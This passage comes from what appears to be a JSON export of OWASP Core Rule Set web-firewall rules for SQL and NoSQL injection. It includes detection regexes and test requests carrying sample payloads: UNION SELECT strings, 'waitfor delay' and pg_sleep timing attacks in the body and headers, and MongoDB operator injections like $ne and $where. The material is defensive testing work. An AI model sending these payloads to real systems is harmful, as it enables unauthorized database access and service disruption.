"quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 322, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 303 } }, { "rule_id": "942270", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)union.*?select.*?from", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Looking for basic sql injection. Common attack string for mysql, oracle and others", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "basic sql injection. Common attack string for mysql, oracle and others", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=union%20select%20col%20from", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942270 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=union%20select%20col%20from" } ] }, { "description": "Status Page Test - SQL injection test with Xunionselectfrom (missing word boundary at the beginning)", "test_id": 2, "request": { "method": "GET", "uri": "/get?test=Xunionselectfrom", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942270 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=Xunionselectfrom" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 324, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)union.*?select.*?from", "actions": [ { "act_name": "id", "lineno": 325, "act_quote": "no_quote", "act_arg": "942270", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 326, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 327, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 328, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 329, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 329, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 330, "act_quote": "quotes", "act_arg": "Looking for basic sql injection. Common attack string for mysql, oracle and others", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 331, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 332, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 333, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 334, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 335, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 336, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 337, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 338, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 339, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 340, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 341, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 342, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 343, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 324 } }, { "rule_id": "942280", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "REQUEST_HEADERS", "part": "User-Agent", "negated": false }, { "name": "REQUEST_HEADERS", "part": "Referer", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)select[\\s\\x0b]*?pg_sleep|waitfor[\\s\\x0b]*?delay[\\s\\x0b]?[\\\"'`]+[\\s\\x0b]?[0-9]|;[\\s\\x0b]*?shutdown[\\s\\x0b]*?(?:[#;\\{]|/\\*|--)", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=select%20pg_sleep", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942280 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=select%20pg_sleep" } ] }, { "description": "SQL Server waitfor delay attack", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" }, "expected": { "should_block": true, "rule_ids": [ 942280 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" } ] }, { "description": "SQL Server waitfor delay attack - Referer", "test_id": 3, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Referer": "https://www.example.com/search?hl=en&q=testing-1 waitfor delay '0:0:15' --" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942280 ] }, "malicious_patterns": [ { "location": "header_referer", "value": "https://www.example.com/search?hl=en&q=testing-1 waitfor delay '0:0:15' --" } ] }, { "description": "SQL Server waitfor delay attack - User-Agent", "test_id": 4, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36-1 waitfor delay '0:0:15' --", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942280 ] }, "malicious_patterns": [ { "location": "header_user-agent", "value": "OWASP CRS test agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36-1 waitfor delay '0:0:15' --" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 350, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "Referer", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)select[\\s\\x0b]*?pg_sleep|waitfor[\\s\\x0b]*?delay[\\s\\x0b]?[\\\"'`]+[\\s\\x0b]?[0-9]|;[\\s\\x0b]*?shutdown[\\s\\x0b]*?(?:[#;\\{]|/\\*|--)", "actions": [ { "act_name": "id", "lineno": 351, "act_quote": "no_quote", "act_arg": "942280", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 352, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 353, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 354, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 355, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 355, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 356, "act_quote": "quotes", "act_arg": "Detects Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 357, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 358, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 359, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 360, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 361, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 362, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 363, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 364, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 365, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 366, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 367, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 368, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 369, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 350 } }, { "rule_id": "942290", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\[?\\$(?:a(?:bs|c(?:cumulator|osh?)|dd(?:ToSet)?|ll(?:ElementsTrue)?|n(?:d|yElementTrue)|rray(?:ElemA|ToObjec)t|sinh?|tan[2h]?|vg)|b(?:etween|i(?:narySize|t(?:And|Not|(?:O|Xo)r)?)|ottomN?|sonSize|ucket(?:Auto)?)|c(?:eil|mp|o(?:n(?:cat(?:Arrays)?|d|vert)|sh?|unt|variance(?:Po|Sam)p)|urrentDate)|d(?:a(?:te(?:Add|Diff|From(?:Parts|String)|Subtract|T(?:o(?:Parts|String)|runc))|yOf(?:Month|Week|Year))|e(?:greesToRadians|nseRank|rivative)|iv(?:ide)?|ocumentNumber)|e(?:(?:a|lemMat)ch|q|x(?:ists|p(?:MovingAvg|r)?))|f(?:i(?:lter|rstN?)|loor|unction)|g(?:etField|roup|te?)|(?:hou|xo|yea)r|i(?:fNull|n(?:c|dexOf(?:Array|Bytes|CP)|tegral)?|s(?:Array|Number|o(?:DayOfWeek|Week(?:Year)?)))|jsonSchema|l(?:astN?|et|i(?:ke|(?:nearFil|tera)l)|n|o(?:cf|g(?:10)?)|t(?:e|rim)?)|m(?:a(?:p|xN?)|e(?:dian|rgeObjects|ta)|i(?:llisecond|n(?:N|ute)?)|o(?:d|nth)|ul(?:tiply)?)|n(?:atural|e|in|o[rt])|o(?:bjectToArray|r)|p(?:ercentile|o(?:[pw]|sition)|roject|u(?:ll(?:All)?|sh))|r(?:a(?:diansToDegrees|n(?:[dk]|ge))|e(?:(?:duc|nam)e|gex(?:Find(?:All)?|Match)?|place(?:All|One)|verseArray)|ound|trim)|s(?:(?:ampleRat|lic)e|e(?:cond|t(?:Difference|(?:Equal|WindowField)s|Field|I(?:ntersection|sSubset)|OnInsert|Union)?)|(?:hif|pli|qr)t|i(?:nh?|ze)|ort(?:Array)?|t(?:dDev(?:Po|Sam)p|r(?:Len(?:Bytes|CP)|casecmp))|u(?:b(?:str(?:Bytes|CP)?|tract)|m)|witch)|t(?:anh?|ext|o(?:Bool|D(?:(?:at|oubl)e|ecimal)|HashedIndexKey|Int|Lo(?:ng|wer)|ObjectId|String|U(?:UID|pper)|pN?)|r(?:im|unc)|s(?:Increment|Second)|ype)|unset|w(?:eek|here)|zip)\\]?", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Finds basic MongoDB SQL injection attempts", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Test as described in http://www.client9.com/article/five-interesting-injection-attacks/", "test_id": 1, "request": { "method": "GET", "uri": "/get/mongo/show.php?u_id[$ne]=2", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942290 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "u_id[$ne]=2" } ] }, { "description": "basic MongoDB NOSQL injection attempts", "test_id": 2, "request": { "method": "GET", "uri": "/get?mongoQ=%5b%24lte%5dasdfsd", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942290 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "mongoQ=%5b%24lte%5dasdfsd" } ] }, { "description": "basic MongoDB NOSQL injection attempts 2", "test_id": 3, "request": { "method": "GET", "uri": "/get/mongo/show.php?u_id[$regex]=2", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942290 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "u_id[$regex]=2" } ] }, { "description": "basic MongoDB NOSQL injection attempts 3", "test_id": 4, "request": { "method": "GET", "uri": "/get/mongo/show.php?u_id[$regex]=2", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942290 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "u_id[$regex]=2" } ] }, { "description": "basic MongoDB NOSQL injection attempts 4", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "*/*", "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/json" }, "data": "{\"$not\": \"foo\"}" }, "expected": { "should_block": true, "rule_ids": [ 942290 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"$not\": \"foo\"}" } ] }, { "description": "basic MongoDB NOSQL injection attempts 5", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "*/*", "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/json" }, "data": "{\"$nor\": \"foo\"}" }, "expected": { "should_block": true, "rule_ids": [ 942290 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"$nor\": \"foo\"}" } ] }, { "description": "basic MongoDB NOSQL injection attempts 6", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "*/*", "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/json" }, "data": "{\"$where\": \"foo\"}" }, "expected": { "should_block": true, "rule_ids": [ 942290 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"$where\": \"foo\"}" } ] }, { "description": "basic MongoDB NOSQL injection attempts 7", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "*/*", "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/json" }, "data": "{\"$elemMatch\": \"foo\"}" }, "expected": { "should_block": true, "rule_ids": [ 942290 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"$elemMatch\": \"foo\"}" } ] }, { "description": "basic MongoDB NOSQL injection attempts 8", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "*/*", "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/json" }, "data": "{\"$text\": \"foo\"}" }, "expected": { "should_block": true, "rule_ids": [ 942290 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"$text\": \"foo\"}" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 376, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\[?\\$(?:a(?:bs|c(?:cumulator|osh?)|dd(?:ToSet)?|ll(?:ElementsTrue)?|n(?:d|yElementTrue)|rray(?:ElemA|ToObjec)t|sinh?|tan[2h]?|vg)|b(?:etween|i(?:narySize|t(?:And|Not|(?:O|Xo)r)?)|ottomN?|sonSize|ucket(?:Auto)?)|c(?:eil|mp|o(?:n(?:cat(?:Arrays)?|d|vert)|sh?|unt|variance(?:Po|Sam)p)|urrentDate)|d(?:a(?:te(?:Add|Diff|From(?:Parts|String)|Subtract|T(?:o(?:Parts|String)|runc))|yOf(?:Month|Week|Year))|e(?:greesToRadians|nseRank|rivative)|iv(?:ide)?|ocumentNumber)|e(?:(?:a|lemMat)ch|q|x(?:ists|p(?:MovingAvg|r)?))|f(?:i(?:lter|rstN?)|loor|unction)|g(?:etField|roup|te?)|(?:hou|xo|yea)r|i(?:fNull|n(?:c|dexOf(?:Array|Bytes|CP)|tegral)?|s(?:Array|Number|o(?:DayOfWeek|Week(?:Year)?)))|jsonSchema|l(?:astN?|et|i(?:ke|(?:nearFil|tera)l)|n|o(?:cf|g(?:10)?)|t(?:e|rim)?)|m(?:a(?:p|xN?)|e(?:dian|rgeObjects|ta)|i(?:llisecond|n(?:N|ute)?)|o(?:d|nth)|ul(?:tiply)?)|n(?:atural|e|in|o[rt])|o(?:bjectToArray|r)|p(?:ercentile|o(?:[pw]|sition)|roject|u(?:ll(?:All)?|sh))|r(?:a(?:diansToDegrees|n(?:[dk]|ge))|e(?:(?:duc|nam)e|gex(?:Find(?:All)?|Match)?|place(?:All|One)|verseArray)|ound|trim)|s(?:(?:ampleRat|lic)e|e(?:cond|t(?:Difference|(?:Equal|WindowField)s|Field|I(?:ntersection|sSubset)|OnInsert|Union)?)|(?:hif|pli|qr)t|i(?:nh?|ze)|ort(?:Array)?|t(?:dDev(?:Po|Sam)p|r(?:Len(?:Bytes|CP)|casecmp))|u(?:b(?:str(?:Bytes|CP)?|tract)|m)|witch)|t(?:anh?|ext|o(?:Bool|D(?:(?:at|oubl)e|ecimal)|HashedIndexKey|Int|Lo(?:ng|wer)|ObjectId|String|U(?:UID|pper)|pN?)|r(?:im|unc)|s(?:Increment|Second)|ype)|unset|w(?:eek|here)|zip)\\]?", "actions": [ { "act_name": "id", "lineno": 377, "act_quote": "no_quote", "act_arg": "942290", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 378, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 379, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 380, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 381, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 381, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 382, "act_quote": "quotes", "act_arg": "Finds basic MongoDB SQL injection attempts", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 383, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 384, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 385, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 386, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 387, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 388, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 389, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 390, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 391, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 392, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 393, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 394, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 395, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 376 } }, { "rule_id": "942320", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)create[\\s\\x0b]+(?:function|procedure)[\\s\\x0b]*?[0-9A-Z_a-z]+[\\s\\x0b]*?\\([\\s\\x0b]*?\\)[\\s\\x0b]*?-|d(?:eclare[^0-9A-Z_a-z]+[#@][\\s\\x0b]*?[0-9A-Z_a-z]+|iv[\\s\\x0b]*?\\([\\+\\-]*[\\s\\x0b\\.0-9]+,[\\+\\-]*[\\s\\x0b\\.0-9]+\\))|exec[\\s\\x0b]*?\\([\\s\\x0b]*?@|(?:lo_(?:impor|ge)t|procedure[\\s\\x0b]+analyse)[\\s\\x0b]*?\\(|;[\\s\\x0b]*?(?:declare|open)[\\s\\x0b]+[\\-0-9A-Z_a-z]+|::(?:b(?:igint|ool)|double[\\s\\x0b]+precision|int(?:eger)?|numeric|oid|real|(?:tex|smallin)t)", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects MySQL and PostgreSQL stored procedure/function injections", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 